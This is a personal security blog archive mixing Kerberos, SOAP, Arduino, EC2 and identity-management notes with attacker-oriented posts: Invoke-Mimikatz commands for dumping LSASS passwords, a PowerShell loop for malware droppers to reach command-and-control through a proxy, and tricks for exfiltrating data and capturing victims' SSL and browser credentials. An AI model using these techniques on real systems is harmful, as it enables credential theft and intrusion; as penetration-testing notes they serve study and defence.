Wednesday 21 December 2016

Kerberos Working


Kerberos Understanding


Kerberos is a network authentication protocol. It is designed to provide strong authentication for client/server applications by using secret-key cryptography. A free implementation of this protocol is available from the Massachusetts Institute of Technology

  1. Kerberos protocol has 3 key components -
    - Client  [ Users / Applications ]
    - Services
    - Key Distribution Centre (KDC)
  2. Key Distribution Centre (KDC) key components -
    - Ticket Granting Service (TGS)
    - KDC Database
    - Authentication Service

    Note :
     Users/Applications/Services also known as principle             Set of principle is called "realm"
  3. Keys Used in Kerberos Authentication :
    - Secret Keys     :  These keys are shared between KDC and Principle
    - Session Keys   :  These keys are shared between client and services i.e. principles
Overall Workflow - Client needs to access email service
  • Kerberos is single sign on technology
  • In Kerberos, client sends username to KDC
  • KDC in turn search for user in KDC database
  • If user found in KDC database, TGS creates a ticket with limited period of time and sent to client along with session key.
  • Now, if client wants to access email server, then it will create "Authenticator" message containing - Client name, IP Address, Time and encrypt it with session key (S1) provided by KDC
  • Client then sends this TGT + Authenticator encrypted with session key + Service that needs to be access (Mail service) and send it to KDC
  • KDC decrypts message, post confirmation KDC creates a "Service Ticket" and encrypts it with Service key.
  • Service ticket along with new session key (S2) is encrypted with (S1) and send it to client.
  • Client now has service ticket, however it cant be decrypted as it doesn't have service key.
  • Client encrypts authenticator with new session key (S2) and send it to Service (Email Service)
  • Once service receives message, it can decrypt the message with Service key and confirm the identity.
  • Client can have communication with service!


Kerberos Key Components



Kerberos Overall Flow - Client wants to access email service























Below are some of the best links I came across for understanding Kerberos :
Link 1
Link 2
Link 3 ( Blackhat )

Potential weaknesses in Kerberos :

  1. KDC can be single point of failure
  2. Secret keys are stored temporarily on users workstations 
  3. Session keys either reside in cache or in key table 
  4. Kerberos is vulnerable to password guessing - KDC doesn't have any mechanism to detect bruteforce attempts.
  5. Network traffic is not protected if encryption is not enabled
  6. Too short keys - vulnerable to bruteforce
  7. Kerberos needs all client and server clock to be synchronised



Hope this helps! Thanks for visiting!

Wednesday 16 November 2016

SOAP (Simple Object Access Protocol ) - Understanding


SOAP - Simple Object Access Protocol


  1. Consider a scenario where Application A needs to communicate with Application B
  2. Application A needs to get status of credit card from Application B
  3. In this case, web service will be created on application B
  4. Irrespective of underlying technology, Application A will be able to send SOAP requests containing (Credit card no.) to Application B web service.
  5. Application B web service will process request and generate SOAP response which will be sent to Application A

Refer below diagram :


Below are actual SOAP request and response calls captured in Burpsuite :




























SOAP - Youtube Video

Friday 21 October 2016

Group Policy Misconfiguration - Encrypted password (cpassword)


I was simulating in my active directory test environment on group policy misconfiguration issue and hence posting it here for reference.

If local admin users are pushed via GPO, Domain logged in users can just search for "Group.XML" or ".XML" file on their local system.

This files contains AES encrypted password, and fortunately Microsoft has published AES keys used to encrypt this password here













Push "localadmin" user via GPO - It's damn simple, just have to add user in Group Policy Management Editor > Computer Configuration > Preferences > Local User and Groups

Once you create localadmin user via GPO, it shows this alert - Password is discoverable


















Once user is created, you can go to any workstation in your domain and just connect to domain controller via \\IP  and search for .XML file.

We can clearly see encrypted password in file Groups.XML file.




















I suppose, solution for this is pretty simple, you just have to remove user from control panel on domain controller.



















Extracting password for "localadmin" using powershell script

You can find the script here

















I know its pretty simple to execute, but all I wanted to check is actual AD configuration!

Thanks.

Thursday 20 October 2016

Certutil - Base64 encode/decode


Simple utility included comes inbuilt in Microsoft windows : certutil.exe

Link : https://technet.microsoft.com/en-us/library/cc732443(v=ws.11).aspx

Very useful if you want to quickly convert file into base64 encoding format, and probably exfiltrate later ;)


Encoding .PNG file in base64 






Decoding base64 file







Saturday 20 August 2016

RDP Access Timestamp - Registry Forensics


How do we know if System "A" connected to other systems using Remote Desktop in past?

We can retrieve IP addresses with which RDP connections were established in past along with last time stamp.


You can find all machines where RDP was done under below key :

"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"

You can see all IP addresses along with DOMAIN/USERNAME used to connect to system via RDP

If you want to retrieve date and timestamp of last modification of these registry keys - (Which in turn indicates when RDP connection was established with system) then,

Export registry key as a ".txt" file and you will be able to see "Last Write Time" which is not the case if you export the key as ".reg" - That's the trick!

















Retrieve Passwords from LSASS via Powersploit Invoke-Mimikatz


Came across a scenario where, was able to run powersploit on one of the machine (HOST) with antivirus.

However, wanted to crack passwords for other systems!!!

Simply get LSASS dump from other machines - Not a malicious activity!
Copy all those LSASS dump files on (HOST) and using powersploit -Command argument retrieve passwords from LSASS dump.

Executing powersploit - Invoke-Mimikatz tool to retrieve passwords from LSASS dump file.


Commands Quick Reference :

  1. Get-ExecutionPolicy
  2. Set-ExecutionPolicy Unrestricted
  3. Import-Module.\powersploit.psm1
  4. Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords"'   





















Good references :
https://github.com/PowerShellMafia/PowerSploit
https://adsecurity.org/?page_id=1821
https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
https://www.sans.org/reading-room/whitepapers/forensics/mimikatz-overview-defenses-detection-36780


Retrieve Passwords from LSASS via Powersploit Invoke-Mimikatz


Came across a scenario where, was able to run powersploit on one of the machine (HOST) with antivirus.

However, wanted to crack passwords for other systems!!!

Simply get LSASS dump from other machines - Not a malicious activity!
Copy all those LSASS dump files on (HOST) and using powersploit -Command argument retrieve passwords from LSASS dump.

Executing powersploit - Invoke-Mimikatz tool to retrieve passwords from LSASS dump file.


Commands Quick Reference :

  1. Get-ExecutionPolicy
  2. Set-ExecutionPolicy Unrestricted
  3. Import-Module.\powersploit.psm1
  4. Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords"'   





















Good references :
https://github.com/PowerShellMafia/PowerSploit
https://adsecurity.org/?page_id=1821
https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
https://www.sans.org/reading-room/whitepapers/forensics/mimikatz-overview-defenses-detection-36780


Thursday 5 May 2016

Authenticate to proxy with current credentials


Droppers when deployed on victim machines attempt to connect to C&C centre however corporate proxy comes into picture

Below Powershell code will authenticate to proxy via current credentials and fetch contents from "http://microsoft.com"


for($i=0; $i -le 0; $i)
{
$wc = New-Object System.Net.WebClient
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
$wc.DownloadString('http://microsoft.com')
Start-Sleep -s 5

}


















We can further create powershell script executable .exe file with PS2EXE


Saturday 30 April 2016

Arduino - Display Character on 4 Digit 7 Segment Display


Hi,

Going one step further in learning Arduino UNO, I wanted to print word "HACK" on Display module with 4 Digit and 7 Segments, you can check specification here : Link

I was struggling to know how it works and which pins to connect where on Arduino board.

As its digital display we will use Digital pins from Arduino board  from 1 to 13.
























This is how segments are numbered on actual Display Unit from a to g















Now how do you set-up the Circuit?




Pin structure and its functionality is as follows :



















Key is Logic!....If you want to display anything on Digit 1 of display uni then you need to enable Arduino Pin 2 and set its voltage to HIGH and set other Digits to LOW

Core Program Logic 

1. Turn on first digit, turn off all other digits
2. Turn on segments we need for first digit and set delay to 5
3. Turn off all digits, turn on second digit
4. Turn on segments we need for second digit and set delay to 5
5. Turn off all digits, turn on third digit
6. Turn on segment we need for third digit and set delay to 5
7. Turn off all digits, turn on fourth digit

8. Turn on all segments we need for fourth digit and set delay to 5
























Hope this helps...!







Arduino Uno Tutorial - Blinking LED


Hi,

I never worked on Arduino before so it's really interesting!..

Just to give you basic intro, we can use Arduino board for connecting multiple sensors, LED's, Display Units and program them to what we want!.

To start with, lets blink an LED !



  1. Take any sample LED light, in simple language it always has 2 "Legs" one is long and other is short -  Long Leg = Positive (+)   ,  Short Leg = Negative  (-)
  2. For this project, insert Short Leg of your LED into ground socket "GND" of your Arduino board and Long Leg into Socket No. 13
  3. Now your all set for programming your Arduino Board.
  4. You need Arduino IDE for writing a program, and its similar to C programming!
  5. Download your IDE from https://www.arduino.cc/en/Main/Software
  6. Setup() function is used for setting up environment, like declaring variables 
  7. loop() function is used for executing code continuously
void setup() {
  // initialize digital pin 13 as an output.
  pinMode(13, OUTPUT);
}

// the loop function runs over and over again forever
void loop() {
  digitalWrite(13, HIGH);   // turn the LED on (HIGH is the voltage level)
  delay(100);              // wait for a second
  digitalWrite(13, LOW);    // turn the LED off by making the voltage LOW
  delay(100);              // wait for a second
}


That's it, now its time to run your first program on Arduino UNO.


Blue LED - Short Leg connected to GND and Long Leg connected to pin 13 of Arduino





















Arduino IDE - Program to Blink LED connected on pin 13

















LED Started Blinking!....


























Will post more on Arduino Board soon...

Tuesday 19 April 2016

Dumping Clear Text browser passwords from Windows Memory


Hi,

We all know about Mimikatz tool being used for dumping windows credentials from memory.
What if we want to retrieve passwords from web browser or other applications from memory?
Ex. google.com, facebook.com or any other website/corporate web portals

Most of the time in corporate network, employees logs in to corporate portal with Domain passwords.
If you can dump memory from machine and analyse to it to get web passwords in clear text then this trick really helps!

Download tool called Dumpit from here

Lets imagine a scenario where victim has logged in to Gmail.com













Attacker executed Dumpit.exe with Admin rights










You can simply analyse .raw dump file with windows "find" command or "findstr" command.
and you can get all passwords in clear text!

Below screenshot you can see clear text passwords for gmail.com entered earlier in browser!












Data Exfiltration via HTTP / Web server logs


Hi ,

I was just working on project, and got an Idea of exfiltrating data via HTTP!......
This might be already know to you, but adding here for documenting purpose.

Scenario :
What is if you have access to a victim machine and quickly want to ex filtrate some very important figures/key data or may be anything.

First thing is copy all your data in this case attacker wants to exfiltrate some victim credentials.

Simply paste data after attackers domain name / IP this will generate Logs at attackers web server.
Attacker will simply open web server log file and read the ex-filtrated data i.e credentials.












Attackers opens web server logs and look for ex-filtrated data









Attacker replaces by default encoded characters and view credentials













Although its very simple trick but its works in real environment!..




Friday 15 April 2016

Decrypting SSL traffic via tshark


Hi,

Just a thought what is we get domain access, can access any machine within network and further eavesdrop on SSL connections on multiple machines? one step ahead, send data to attacker!

tshark -n -r ssl.pcapng -o http.ssl.port:443,4430-4433 -o ssl.keylog_file:sslkeylog.log -Y ssl -V -Y "http.request" | find "pass"


  1. "ssl.pcappng" is our pcap dump file
  2. "sslkeylog.log" is our pre master secret file containing SSL keys generated by browser
  3. "-o" is used to change preferences setting for SSL protocol to get SSL keys from log file.










Hope this helps!

Decrypt SSL Traffic


Hi Consider a scenario where attacker has access to client machines and want to further intercept SSL traffic to extract may be bank username, password or anything over SSL!!!

Well first thing attacker need to enable logging of SSL keys!

How can you log SSL Keys in a log file?

By default, Crome and Firefox browser has capability to export SSL keys provided you point your browsers to the flat log file location, well how can you point your browsers to log all keys into the log file ?

For this you need to follow below steps :

  1. Create user environment  "Variable name" =  SSLKEYLOGFILE
  2. Set the "Variable value" = Path of log file where you want to save SSL logs
  3. Ex. Variable value = C:\users\admin\ssllog.log
  4. Create blank file on above specified path "c:\users\admin" with same name "ssllog.log" 
  5. That's it!....
  6. Start browsing any SSL enabled websites Ex. https://www.yahoo.com
  7. You will see that browser has started depositing SSL key data in your "ssllog.log" file
  8. Now it's matter of time before you decrypt the traffic using Wire shark
  9. Open your Wireshark instance
  10. Go to Edit > Preferences > Protocols > Select SSL and add the location of "ssllog.log" file
  11. Now your are all set to decrypt SSL traffic of websites being visited on the browser!
  12. Lets open https://yahoo.com and login with your username and password
  13. You can see that traffic has been decrypted by wireshark and we can clearly see usernames and passwords in plain text!!!!


 











That's it, we have successfully decrypted SSL traffic, although its older technique but still effective.







Friday 18 March 2016

Amazing Download and upload Speed from Amazon EC2 instance


Amazing Download and upload Speed from Amazon EC2 instance!!

Image result for amazon ec2 black











Pointing DNS Zone File to Amazon EC2 Server IP


Recently I have came across situation where I had to point my DNS to Amazon EC2 instance.

My Set-up:
  1. Amazon EC2 Windows Server
  2. Public IP allocation for Amazon server is Dynamic
  3. Purchased Domain name from GoDaddy.com


As our server IP is dynamic, and we want users who visit : http://www.mydomain.com to redirect on our Amazon EC2 windows server, we will edit "DNS Zone" file on GoDaddy.com website :
  1. Edit DNS Zone file - 
  2. Change "A" record 
  3. Set "Host" = "@" 
  4. Set "Points To" = 53.2.3.12 ( IP of Amazon EC2 Instance)

















Changing DNS Zone file record to point to our Amazon EC2 Instance













After some time DNS settings should apply and if you try to ping www.mydomain.com it will show you IP address of your Amazon EC2 instance






Zoomeye Search Engine for Cyberspace


Recently I came across cool search engine for Cyberspace.
This is the place where  you can search by  :

  1. Port Numbers
  2. Application name and version
  3. Location - Country and city
  4. Operating System
  5. Service name
  6. Hostname
  7. IP Address
  8. CIDR notification - i.e. by IP subnets

This search engine may come in handy while performing external reconnaissance activities.


Searching for IP's with 3389 open port























Here is the User Manual






Saturday 12 March 2016

Citrix XenApp Open Command Prompt in Restricted Environment


Recently I came across interesting stuff related to Citrix XenApp
Although its very simple to perform but important to know what a normal user can do in Restricted Environment.

How can you test what is possible in restricted Citrix Environment?

Scenario : You have just given access to outlook application by default.

Isn't it interesting if User who has access to Citrix environment is able to ex-filtrate data on the machine to outside world ?

Test Cases (Simple and Old techniques) :

  1. Open "Save As"
  2. Attempt to create Text file 
  3. Edit text files and add "cmd.exe" and save as "file.bat"
  4. Right click and execute "file.bat"
  5. It should execute command prompt in Citrix environment.
  6. You can also attempt to open Help and search for "How to open command prompt" , it should show you - Click here to open command prompt
  7. You can further attempt to perform 
    1. Privilege escalation
    2. Attempt to ex-filtrate data via Browser by opening "iexplore.exe"
Links you can refer for reviewing Citrix configurations

Link 1
Link 2
Link 3
Link 4


These are some of the simple and old ways an user can open command prompt and perform restricted operations in Citrix Environment.

Sunday 6 March 2016

Identity and Access Management (IdM)



Identity and Access Management (IdM) :

  1. IdM allows organizations to create, maintain, terminate digital identities in timely and automated fashion.

Enterprise deals with below things :

  1. What should each user have access to - Printers/Internet websites/Remote desktop access
  2. Who approves and allows access - Approver for allowing access
  3. How do the access decision map to policies - Does accessing RDP service map to organization policy
  4. Do former employee still have access to 
  5. How to keep up with dynamic and ever changing environment
  6. How is access controlled and monitored centrally.
  7. Why should employee remember multiple passwords
  8. Centralizing credentials set
  9. Controlling access for employees, customers, partners
  10. Compliant with regulation



LDAP (Lightweight Directory Access Protocol) :
















The string ("CN=Dev-India,OU=Distribution Groups,DC=gp,DC=gl,DC=google,DC=com") is a path from an hierarchical structure (DIT = Directory Information Tree) and should be read from right (root) to left (leaf).
It is a DN (Distinguished Name) (a series of comma-separated key/value pairs used to identify entries uniquely in the directory hierarchy). The DN is actually the entry's fully qualified name.






Reference Link



What is Meta Directory in IdM :


  1. Meta Directory is directory containing information fetched from various sources and stored in central directory, which provides a unified view.
  2. Meta Directory synchronizes itself with all identity sources periodically to ensure most up to date information is being used by applications and IdM components within enterprise.























Image Source

An example of Meta Directory product MetaDirectory product from "etos"
The MetaDirectory product has capabilities to merges various databases into a single, consistent LDAP directory that can be used throughout the company.

MetaDirectory product supports below technologies as a source for collecting data (Interfaces)  :

• ODBC (Access, SQL Server, MySQL)
• LDAP (OpenLDAP, NDS, public directory services)
• Active Directory / global catalogues
• Public exchange directories
• Off ice 365
• Lotus Notes databases
• Tobit David (free connector)
• DATEV pro and DATEV proprietary organization
• Microsoft Dynamics AX, CRM and Navision
• Microsoft Dynamics CRM Online
• Das Telefonbuch
• Herold
• KlickTel
• TwixTel
• Swisscom Directories

Official Link



What is Virtual Directory :

Virtual directory play similar role as Meta Directory however difference is,

Metadata Directory - Collects data from multiple sources and stores data in single Physical Directory
Virtual Directory - Virtual Directory does not store data in Physical Directory however, it just points to location where actual data is stored.


Good example can be a Dell product named  "Dell One Identity Virtual"



















Web Access Management :

Web access management software controls what user can access when using web browser to interact with we-based enterprise assets.

WAM software is a gateway between User and Corporate web based resources.

When user request for access web server software will query in a directory.
Another important thing is to "Keep track of user activity"